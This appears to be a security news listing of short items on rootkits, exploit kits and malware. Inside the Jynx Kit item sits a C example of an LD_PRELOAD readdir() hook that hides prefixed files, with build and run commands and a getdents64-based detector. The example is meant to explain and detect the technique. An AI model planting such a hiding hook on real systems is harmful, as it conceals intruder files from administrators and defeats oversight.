TCP/IP Invisible Userland Unix Backdoor with Reverse Shell
Exploit for unix platform in category local exploits. TCP/IP Invisible Userland Unix Backdoor with Reverse Shell (ASCII-art banner from the original header omitted)...
Attackers Targeting Windows Media Bug With Malware
Security researchers have seen attackers going after the newly patched CVE-2012-0003 vulnerability in the Windows Media Player. The flaw, which was patched earlier this month by Microsoft, is a critical one that can enable remote code execution, and it affects a wide range of Windows systems. Whe...
超级巡警 avtsafe.sys <= 1.0.0.4 Local Kernel Denial of Service Vulnerability
超级巡警 is a tool for detecting and removing trojans, rogue software, backdoors that use rootkit techniques, other malicious code, spyware, worms and so on. None of the hook functions in its driver avtsafe.sys perform any parameter validation. Affected: 超级巡警 avtsafe.sys <= 1.0.0.4. No fix yet; watch for an official patch at http://www.sucop.com/...
New Version of Stoned Bootkit Said to Bypass Windows 8 Secure Boot
A security researcher who has in the past created low-level rootkits capable of staying resident on an infected machine across reboots says he has now accomplished the same feat on Windows 8, which hasn't even hit the shelves yet. Peter Kleissner said he has created a new version of his Stone...
Stuxnet 3.0 possibly to be released at MalCon?
Stuxnet 3.0 possibly to be released at MalCon? Malware coders and security researchers are increasingly looking to the MalCon malware convention to show off their latest creations and research. We were pretty shocked to see in a Twitter update today from MalCon that one of the research paper...
TDSS Rootkit and DNSchanger: An Unholy Alliance
The TDSS rootkit has proven to be more pliable and adaptable than a campaigning politician, and attackers have used it in various forms for the last three or four years for all sorts of different attacks. It shows up in drive-by downloads, targeted attacks and just about everything in between, an...
Blackhole Exploit Kit attack on WampServer & Wordpress sites
Blackhole Exploit Kit attack on WampServer & Wordpress sites. Kimberly from Stopmalvertising found the Blackhole Exploit Kit on the website of the popular web server package WAMPSERVER. Near the bottom of the web page they noticed a JavaScript requesting a file from jquery.googlecode.com. The URL...
India Seizes Equipment Linked to Duqu Attack
Officials in India have seized components from a server as part of an investigation into the Duqu Trojan, according to a report. According to Reuters, two workers at Web Werks, a web hosting company based in Mumbai, said the country’s Department of Information Technology took the equipment after...
Stuxnet's Son "Duqu" Removal Tool released by Bitdefender
Stuxnet's Son "Duqu" Removal Tool released by Bitdefender Rootkit.Duqu is a new e-threat that combines the technology of the military-grade Stuxnet with an advanced keylogger and backdoor application. Due to its rootkit technology, the piece of malware can stay hidden from the user, the operating...
Jynx Kit (LD_PRELOAD) Userland Rootkit Released
Jynx Kit (LD_PRELOAD) Userland Rootkit Released. Jynx Kit is an LD_PRELOAD userland rootkit, claimed fully undetectable by chkrootkit and rkhunter. It includes a magic-packet SSL reverse-connect shell triggered by the SEQ/ACK numbers of a single packet. A solid building block for further LD_PRELOAD rootkits...
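The hiding technique behind an LD_PRELOAD rootkit such as Jynx, and the check that defeats it, as an added example that is neither Jynx's code nor from the original listing: a readdir() hook that silently drops any directory entry starting with an assumed magic prefix (jynx_, chosen for this demo; Jynx's real configuration is not on the page), beside a detector that enumerates the same directory through the raw getdents64 syscall, which a userland hook cannot intercept. Linux with glibc is assumed, and the scratch directory and file names are constructed for the demo.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>
/* Magic prefix assumed for this demo; Jynx's real configuration is not on the page. */
#define HIDE_PREFIX "jynx_"

/* Interposed readdir(): the core LD_PRELOAD trick. Built as a shared object and
 * loaded with LD_PRELOAD this definition shadows libc's readdir() in every
 * dynamically linked program (ls, find, the helpers a checker shells out to);
 * compiled into this executable it interposes the same way for this process. */
struct dirent *readdir(DIR *dirp)
{
    static struct dirent *(*real_readdir)(DIR *);
    if (!real_readdir)
        *(void **)&real_readdir = dlsym(RTLD_NEXT, "readdir");
    struct dirent *e;
    while ((e = real_readdir(dirp)) != NULL) {
        /* Drop entries carrying the magic prefix; pass everything else through. */
        if (strncmp(e->d_name, HIDE_PREFIX, strlen(HIDE_PREFIX)) != 0)
            return e;
    }
    return NULL;
}

/* What a libc-based tool sees: the directory walked through the hooked readdir(). */
int count_via_readdir(const char *path)
{
    DIR *d = opendir(path);
    if (!d) return -1;
    int n = 0;
    while (readdir(d) != NULL) n++;
    closedir(d);
    return n;
}

struct raw_dirent64 {            /* record layout returned by getdents64(2) */
    unsigned long long d_ino; long long d_off;
    unsigned short d_reclen; unsigned char d_type; char d_name[];
};

/* Detection path: enumerate through the raw syscall, bypassing libc and any
 * userland hook. A kernel rootkit could still lie here; an LD_PRELOAD one cannot. */
int count_via_getdents(const char *path)
{
    int fd = open(path, O_RDONLY | O_DIRECTORY);
    if (fd < 0) return -1;
    char buf[8192] __attribute__((aligned(8)));
    int n = 0;
    for (;;) {
        long nread = syscall(SYS_getdents64, fd, buf, sizeof buf);
        if (nread <= 0) break;
        for (long pos = 0; pos < nread; n++)
            pos += ((struct raw_dirent64 *)(buf + pos))->d_reclen;
    }
    close(fd);
    return n;
}

/* Build a scratch directory with two ordinary and two "rootkit" files (constructed
 * names) and return how many entries the hook concealed: raw count minus hooked. */
int demo_hidden_entries(void)
{
    static const char *names[] = { "notes.txt", "log", "jynx_sock", "jynx_config" };
    const size_t count = sizeof names / sizeof *names;
    char dir[64] = "/tmp/ldpreload_demo_XXXXXX";
    if (!mkdtemp(dir)) {                      /* /tmp not writable: use the cwd */
        strcpy(dir, "ldpreload_demo_XXXXXX");
        if (!mkdtemp(dir)) return -1;
    }
    char p[128];
    for (size_t i = 0; i < count; i++) {
        snprintf(p, sizeof p, "%s/%s", dir, names[i]);
        int fd = open(p, O_WRONLY | O_CREAT | O_EXCL, 0600);
        if (fd < 0) return -1;
        close(fd);
    }
    int hooked = count_via_readdir(dir);   /* ".", "..", notes.txt, log */
    int raw    = count_via_getdents(dir);  /* all six entries */
    for (size_t i = 0; i < count; i++) {
        snprintf(p, sizeof p, "%s/%s", dir, names[i]);
        unlink(p);
    }
    rmdir(dir);
    return (hooked < 0 || raw < 0) ? -1 : raw - hooked;
}

int main(void)
{
    int hidden = demo_hidden_entries();
    printf("entries hidden from readdir(): %d\n", hidden);   /* prints 2 */
    return hidden == 2 ? 0 : 1;
}
```

Built as a shared object (cc -shared -fPIC -o libhide.so hide.c, adding -ldl on glibc older than 2.34) and run as LD_PRELOAD=./libhide.so ls on that directory, an unmodified ls shows the same filtered view, which is why checkers that walk the filesystem through libc come up clean. Comparing the libc view against the raw getdents64 view is the cross-check a detector should make; it only separates userland hooks from the truth, since a kernel-level rootkit can lie on the syscall path as well.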
Malicious Ads on Bing Lead to ZeroAccess Trojan
Search-engine poisoning has been the bane of many Internet users’ existence for a long time, and it’s one of many security problems that seems to not be getting any better. In some ways, it may be getting worse, actually. One of the main problems these days is the use of legitimate-looking ads th...
New 'Nice Pack' Exploit Kit Found, Thousands of Owned Sites Redirecting Users to Attack Site
A new exploit pack has appeared on the scene in the last week or so and it already is causing trouble for users, with thousands of compromised Web sites redirecting users to a page that is hosting the pack and exploiting vulnerabilities on their machines to install malware. The attackers behind t...
Alureon Rootkit Morphs Again, Adds Steganography
The Alureon rootkit has become not just a major headache for its victims, with its insidious infection routines and its persistence once on a machine, but also a challenge for researchers trying to identify new versions and unwind its new tactics and techniques. The...
GMER 1.0.15.15641 - MFT Overwrite
Exploit for windows platform in category dos / poc. Program: GMER 1.0.15.15641 / Homepage: http://www.gmer.net / Discovery: 2011/08/01 / Author Contacted: 2011/08/09 / Status of vuln: 0day / Found by: Heurs / This Advisory: Heurs / Contact: [email protected] // Application description: GMER is an application...
BIOS based Virus discovered by Chinese Security Firm
BIOS based Virus discovered by Chinese Security Firm. The Chinese AV company 360 discovered a new Trojan, the "BMW Virus", also called Mebromi, that can actually infect a computer's BIOS: "BMW 360 Security Center virus is the latest catch of a high-risk virus, the virus that infected a chain BIOS...